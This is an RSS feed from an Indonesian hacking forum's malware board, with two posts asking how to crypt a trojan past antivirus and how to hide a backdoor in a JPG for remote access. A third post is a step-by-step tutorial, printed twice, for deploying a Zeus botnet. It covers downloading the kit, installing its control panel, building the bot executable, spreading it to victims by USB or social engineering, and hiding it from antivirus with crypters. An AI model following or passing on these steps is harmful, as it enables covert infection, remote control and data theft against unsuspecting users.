<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/">
	<channel>
		<title><![CDATA[BackBox Indonesia - Malware]]></title>
		<link>https://www.backboxindonesia.or.id/</link>
		<description><![CDATA[BackBox Indonesia - https://www.backboxindonesia.or.id]]></description>
		<pubDate>Wed, 20 May 2026 23:48:49 +0000</pubDate>
		<generator>MyBB</generator>
		<item>
			<title><![CDATA[ask cara binding & crypter trojan/malware?]]></title>
			<link>https://www.backboxindonesia.or.id/thread-212.html</link>
			<pubDate>Wed, 29 Mar 2017 21:40:09 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-212.html</guid>
			<description><![CDATA[gmana cara nya binding &amp; crypter sebuah trojan biar ga ke detek si AV hehe]]></description>
			<content:encoded><![CDATA[gmana cara nya binding &amp; crypter sebuah trojan biar ga ke detek si AV hehe]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[[TANYA] Ada yang tau cara nyisipin backdoor ke poto.jpg]]></title>
			<link>https://www.backboxindonesia.or.id/thread-157.html</link>
			<pubDate>Sun, 31 Jul 2016 00:43:05 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-157.html</guid>
			<description><![CDATA[Hello para mastah sekalian. Ane mau tanya nih, ada yang tau gak cara nyisipin backdoor ke poto.jpg<br />
Jadi gini, ane mau coba tanem backdoor untuk bisa remote accsess ke PC. Nah tapi melalui poto yang di klick. Mohon ilmunya para mastah sekalian. Terima kasih :*]]></description>
			<content:encoded><![CDATA[Hello para mastah sekalian. Ane mau tanya nih, ada yang tau gak cara nyisipin backdoor ke poto.jpg<br />
Jadi gini, ane mau coba tanem backdoor untuk bisa remote accsess ke PC. Nah tapi melalui poto yang di klick. Mohon ilmunya para mastah sekalian. Terima kasih :*]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Remote Administration Tool Zeus BotNet]]></title>
			<link>https://www.backboxindonesia.or.id/thread-144.html</link>
			<pubDate>Fri, 01 Jul 2016 20:20:05 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-144.html</guid>
			<description><![CDATA[Selamat sahur kawan",<br />
Pagi ini saya akan coba mempraktekan system kerja trojan Zeus Botnet.<br />
Pada tutorial kali ini saya tidak akan banyak cuap", karena tutorial kali ini sedikit agak panjang step"nya.<br />
Ayo kita mulai :D<br />
<br />
Pertamatama kita download dulu zeus botnetnya di sini<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>http://www.backboxindonesia.or.id/tmp/zeus_botnet.zip<br />
Password : 123</code></div></div><br />
Setelah kita download, kita extrak filenya di sembarang folder. Nanti di file zip tadi akan meng extrak beberapa file yaitu file<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>builder<br />
other<br />
webserver<br />
client32.bin<br />
config<br />
db.sql</code></div></div><br />
Di sini saya menggunakan system operasi backbox sebagai uji coba server botnetnya. Sebelum lanjut ke langkah berikutnya kita harus install dulu lamp di system kita. Sebagai referensi tutorialnya bisa lihat <a href="http://www.linuxsec.org/2013/12/lampbackbox.html" target="_blank" class="mycode_url">Disini</a>. Langkah selanjutnya kita pindahkan folder "webserver" ke folder "/var/www/html/". Lakukan perintah ini di folder yang telah kita extrak tadi.<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>root@backbox:~&#36; sudo mv webserver/ /var/www/html/webserver/</code></div></div><br />
Setelah itu kita hidupkan webserver yang ada di system kita. Perintah untuk menghidupkannya yaitu.<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>root@backbox:~&#36; sudo service apache2 start</code></div></div>Webserver sudah kita hidupkan, langkah selanjutnya kita buat databasenya di mysql. Ketikan perintah ini untuk login database dan membuat databasenya.<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>root@backbox:~&#36; sudo mysql -u root -p<br />
Enter password: (masukanpassword)<br />
mysql&gt; create database botnet;</code></div></div><br />
Setelah database di buat, kita import file "db.sql" yang sudah kita extrak tadi ke database "botnet" yang telah kita buat dengan perintah ini di terminal tadi.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>mysql&gt; use botnet;<br />
mysql&gt; source /home/user/Downloads/zeus_botnet/db.sql;</code></div></div><br />
Folder source sesuaikan dengan letak file yang agan extrak tadi.<br />
Setelah di import, kita buka browser dan buka alamat ip kita dengan di tambah "/webserver/install/" di alamat ip kita. Sebagai contoh alamatnya seperti ini : <a href="http://192.168.2.1/webserver/install/" target="_blank" class="mycode_url">http://192.168.2.1/webserver/install/</a><br />
Kalau di browser muncul tampilannya seperti ini<br />
<br />
<div style="text-align: center;" class="mycode_align"><img src="http://i.imgur.com/sRk5hwA.png" alt="[Image: sRk5hwA.png]" class="mycode_img" /></div>
<br />
Rubah hak akses root dengan www-data dan rubah permision filenya jadi 0755 di folder /var/www/html/webserver/ dengan mengetikan perintah ini.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>root@backbox:~&#36; sudo su<br />
root@backbox:~&#36; cd /var/www/html/<br />
root@backbox:~&#36; chown www-data:www-data webserver -Rh<br />
root@backbox:~&#36; chmod 0755 webserver -R</code></div></div><br />
Setelah forbiden di fix kita reload kembali browsernya. Dan tampilannya akan seperti ini.<br />
<br />
<div style="text-align: center;" class="mycode_align"><img src="http://i.imgur.com/HxtP8nh.png" alt="[Image: HxtP8nh.png]" class="mycode_img" /></div>
<br />
Data isi sesuai dengan kebutuhan. Ini hanya ilustrasi data yang akan kita input. Setelah itu kita klik tombol install yang ada di sebelah kanan bawah. Tunggu beberapa detik nanti tampilannya akan seperti ini.<br />
<br />
<div style="text-align: center;" class="mycode_align"><img src="http://i.imgur.com/SUmyxwt.png" alt="[Image: SUmyxwt.png]" class="mycode_img" /><br />
<br />
<div style="text-align: left;" class="mycode_align">Setelah proses instalasi selesai, hapus folder install yang ada di folder webserver dengan mengetikan perintah ini di terminal<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>root@backbox:~&#36; sudo rm -rf /var/www/html/webserver/install</code></div></div></div></div>
Berikutnya kita buka alamat ip kita di web browser dengan menambahkan alamat ini "/webserver/cp.php", sebagai contoh alamatnya seperti ini <a href="http://192.168.2.1/webserver/cp.php" target="_blank" class="mycode_url">http://192.168.2.1/webserver/cp.php</a><br />
Alamat itu adalah halaman login botnet yang nanti akan kita gunakan. Kurang lebih tampilannya seperti ini.<br />
<br />
<div style="text-align: center;" class="mycode_align"><img src="http://i.imgur.com/oKvnHLX.png" alt="[Image: oKvnHLX.png]" class="mycode_img" /><br />
<br />
<div style="text-align: left;" class="mycode_align">Langkah berikutnya kita masukan user dan password yang sudah kita buat tadi. Dan taraaa<br />
<br />
<div style="text-align: center;" class="mycode_align"><img src="http://i.imgur.com/htGCzh1.png" alt="[Image: htGCzh1.png]" class="mycode_img" /><br />
<br />
<div style="text-align: left;" class="mycode_align">Server botnet sudah kita buat, selanjutnya kita buat client/trojan untuk kita sebarkan ke komputer korban. Di file extrakan tadi ada folder "builder", di dalam folder itu ada 3 file yaitu file.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>config.txt<br />
webinjects.txt<br />
zsb.exe</code></div></div><br />
Di ketiga file itu kita coba edit file config.txt, file itu adalah setingan buat nge generate trojan yang akan kita buat. Disini saya menggunakan mousepad untuk mengedit file tersebut. Ketik perintah ini di terminal<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>root@backbox:~&#36; mousepad config.txt</code></div></div><br />
Rubah alamat server menjadi alamat ip kita. Sebagai contoh saya rubah alamatnya menjadi seperti ini..<br />
<br />
<div style="text-align: center;" class="mycode_align"><img src="http://i.imgur.com/OCqUcva.png" alt="[Image: OCqUcva.png]" class="mycode_img" /><br />
<br />
<div style="text-align: left;" class="mycode_align">Atau bisa di sesuaikan dengan alamat server yang sudah kita buat.<br />
Setelah setingan sudah kita set, selanjutnya kita buka file "zsb.exe" yang ada di folder builder menggunakan wine. Atau bisa juga ketik di terminal.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>root@backbox:~&#36; wine zsb.exe</code></div></div><br />
Setelah kita eksekusi nanti akan keluar form builder untuk membuat client trojannya. Di aplikasi tersebut kilik "Builder &gt; Build the bot configuration &amp; Build the bot executable" Nanti save &amp; save aja.<br />
<br />
<div style="text-align: center;" class="mycode_align"><img src="http://i.imgur.com/rDqq8xX.png" alt="[Image: rDqq8xX.png]" class="mycode_img" /><br />
<br />
<div style="text-align: left;" class="mycode_align">Dua file berhasil ke generate antara file "bot.exe dan config.bin", dua file ini yang nantinya akan kita simpan di folder "webserver". Untuk memindahkan kedua file tersebut kita ketikan perintah ini di folder builder tadi.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>root@backbox:~&#36; sudo cp bot.exe /var/www/html/webserver/<br />
root@backbox:~&#36; sudo cp config.bin /var/www/html/webserver/<br />
root@backbox:~&#36; sudo chown www-data:www-data /var/www/html/webserver/*</code></div></div><br />
Selanjutnya tahap penyebaran fiile ke komputer yang ingin kita remote dan di susupi. Teknik penyebaran cukup pariatif, kita bisa menyebarkan file tersebut lewat flash disk atau social engineering. Sekedar info saja, kalo file trojan kita tidak ingin ke deteksi oleh antivirus, kita bisa pake program crypter atau binder..<br />
Ibaratnya kita sudah tanam trojan kita ke komputer korban, nah untuk mengakses trojan tersebut kita tinggal buka aja web interface zeus yang tadi sudah kita install. Nanti kalau ada client yang konek ke jaringan akan otomatis terkoneksi dengan server.</div></div></div></div></div></div></div></div>]]></description>
			<content:encoded><![CDATA[Selamat sahur kawan",<br />
Pagi ini saya akan coba mempraktekan system kerja trojan Zeus Botnet.<br />
Pada tutorial kali ini saya tidak akan banyak cuap", karena tutorial kali ini sedikit agak panjang step"nya.<br />
Ayo kita mulai :D<br />
<br />
Pertamatama kita download dulu zeus botnetnya di sini<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>http://www.backboxindonesia.or.id/tmp/zeus_botnet.zip<br />
Password : 123</code></div></div><br />
Setelah kita download, kita extrak filenya di sembarang folder. Nanti di file zip tadi akan meng extrak beberapa file yaitu file<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>builder<br />
other<br />
webserver<br />
client32.bin<br />
config<br />
db.sql</code></div></div><br />
Di sini saya menggunakan system operasi backbox sebagai uji coba server botnetnya. Sebelum lanjut ke langkah berikutnya kita harus install dulu lamp di system kita. Sebagai referensi tutorialnya bisa lihat <a href="http://www.linuxsec.org/2013/12/lampbackbox.html" target="_blank" class="mycode_url">Disini</a>. Langkah selanjutnya kita pindahkan folder "webserver" ke folder "/var/www/html/". Lakukan perintah ini di folder yang telah kita extrak tadi.<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>root@backbox:~&#36; sudo mv webserver/ /var/www/html/webserver/</code></div></div><br />
Setelah itu kita hidupkan webserver yang ada di system kita. Perintah untuk menghidupkannya yaitu.<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>root@backbox:~&#36; sudo service apache2 start</code></div></div>Webserver sudah kita hidupkan, langkah selanjutnya kita buat databasenya di mysql. Ketikan perintah ini untuk login database dan membuat databasenya.<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>root@backbox:~&#36; sudo mysql -u root -p<br />
Enter password: (masukanpassword)<br />
mysql&gt; create database botnet;</code></div></div><br />
Setelah database di buat, kita import file "db.sql" yang sudah kita extrak tadi ke database "botnet" yang telah kita buat dengan perintah ini di terminal tadi.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>mysql&gt; use botnet;<br />
mysql&gt; source /home/user/Downloads/zeus_botnet/db.sql;</code></div></div><br />
Folder source sesuaikan dengan letak file yang agan extrak tadi.<br />
Setelah di import, kita buka browser dan buka alamat ip kita dengan di tambah "/webserver/install/" di alamat ip kita. Sebagai contoh alamatnya seperti ini : <a href="http://192.168.2.1/webserver/install/" target="_blank" class="mycode_url">http://192.168.2.1/webserver/install/</a><br />
Kalau di browser muncul tampilannya seperti ini<br />
<br />
<div style="text-align: center;" class="mycode_align"><img src="http://i.imgur.com/sRk5hwA.png" alt="[Image: sRk5hwA.png]" class="mycode_img" /></div>
<br />
Rubah hak akses root dengan www-data dan rubah permision filenya jadi 0755 di folder /var/www/html/webserver/ dengan mengetikan perintah ini.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>root@backbox:~&#36; sudo su<br />
root@backbox:~&#36; cd /var/www/html/<br />
root@backbox:~&#36; chown www-data:www-data webserver -Rh<br />
root@backbox:~&#36; chmod 0755 webserver -R</code></div></div><br />
Setelah forbiden di fix kita reload kembali browsernya. Dan tampilannya akan seperti ini.<br />
<br />
<div style="text-align: center;" class="mycode_align"><img src="http://i.imgur.com/HxtP8nh.png" alt="[Image: HxtP8nh.png]" class="mycode_img" /></div>
<br />
Data isi sesuai dengan kebutuhan. Ini hanya ilustrasi data yang akan kita input. Setelah itu kita klik tombol install yang ada di sebelah kanan bawah. Tunggu beberapa detik nanti tampilannya akan seperti ini.<br />
<br />
<div style="text-align: center;" class="mycode_align"><img src="http://i.imgur.com/SUmyxwt.png" alt="[Image: SUmyxwt.png]" class="mycode_img" /><br />
<br />
<div style="text-align: left;" class="mycode_align">Setelah proses instalasi selesai, hapus folder install yang ada di folder webserver dengan mengetikan perintah ini di terminal<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>root@backbox:~&#36; sudo rm -rf /var/www/html/webserver/install</code></div></div></div></div>
Berikutnya kita buka alamat ip kita di web browser dengan menambahkan alamat ini "/webserver/cp.php", sebagai contoh alamatnya seperti ini <a href="http://192.168.2.1/webserver/cp.php" target="_blank" class="mycode_url">http://192.168.2.1/webserver/cp.php</a><br />
Alamat itu adalah halaman login botnet yang nanti akan kita gunakan. Kurang lebih tampilannya seperti ini.<br />
<br />
<div style="text-align: center;" class="mycode_align"><img src="http://i.imgur.com/oKvnHLX.png" alt="[Image: oKvnHLX.png]" class="mycode_img" /><br />
<br />
<div style="text-align: left;" class="mycode_align">Langkah berikutnya kita masukan user dan password yang sudah kita buat tadi. Dan taraaa<br />
<br />
<div style="text-align: center;" class="mycode_align"><img src="http://i.imgur.com/htGCzh1.png" alt="[Image: htGCzh1.png]" class="mycode_img" /><br />
<br />
<div style="text-align: left;" class="mycode_align">Server botnet sudah kita buat, selanjutnya kita buat client/trojan untuk kita sebarkan ke komputer korban. Di file extrakan tadi ada folder "builder", di dalam folder itu ada 3 file yaitu file.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>config.txt<br />
webinjects.txt<br />
zsb.exe</code></div></div><br />
Di ketiga file itu kita coba edit file config.txt, file itu adalah setingan buat nge generate trojan yang akan kita buat. Disini saya menggunakan mousepad untuk mengedit file tersebut. Ketik perintah ini di terminal<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>root@backbox:~&#36; mousepad config.txt</code></div></div><br />
Rubah alamat server menjadi alamat ip kita. Sebagai contoh saya rubah alamatnya menjadi seperti ini..<br />
<br />
<div style="text-align: center;" class="mycode_align"><img src="http://i.imgur.com/OCqUcva.png" alt="[Image: OCqUcva.png]" class="mycode_img" /><br />
<br />
<div style="text-align: left;" class="mycode_align">Atau bisa di sesuaikan dengan alamat server yang sudah kita buat.<br />
Setelah setingan sudah kita set, selanjutnya kita buka file "zsb.exe" yang ada di folder builder menggunakan wine. Atau bisa juga ketik di terminal.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>root@backbox:~&#36; wine zsb.exe</code></div></div><br />
Setelah kita eksekusi nanti akan keluar form builder untuk membuat client trojannya. Di aplikasi tersebut kilik "Builder &gt; Build the bot configuration &amp; Build the bot executable" Nanti save &amp; save aja.<br />
<br />
<div style="text-align: center;" class="mycode_align"><img src="http://i.imgur.com/rDqq8xX.png" alt="[Image: rDqq8xX.png]" class="mycode_img" /><br />
<br />
<div style="text-align: left;" class="mycode_align">Dua file berhasil ke generate antara file "bot.exe dan config.bin", dua file ini yang nantinya akan kita simpan di folder "webserver". Untuk memindahkan kedua file tersebut kita ketikan perintah ini di folder builder tadi.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>root@backbox:~&#36; sudo cp bot.exe /var/www/html/webserver/<br />
root@backbox:~&#36; sudo cp config.bin /var/www/html/webserver/<br />
root@backbox:~&#36; sudo chown www-data:www-data /var/www/html/webserver/*</code></div></div><br />
Selanjutnya tahap penyebaran fiile ke komputer yang ingin kita remote dan di susupi. Teknik penyebaran cukup pariatif, kita bisa menyebarkan file tersebut lewat flash disk atau social engineering. Sekedar info saja, kalo file trojan kita tidak ingin ke deteksi oleh antivirus, kita bisa pake program crypter atau binder..<br />
Ibaratnya kita sudah tanam trojan kita ke komputer korban, nah untuk mengakses trojan tersebut kita tinggal buka aja web interface zeus yang tadi sudah kita install. Nanti kalau ada client yang konek ke jaringan akan otomatis terkoneksi dengan server.</div></div></div></div></div></div></div></div>]]></content:encoded>
		</item>
	</channel>
</rss>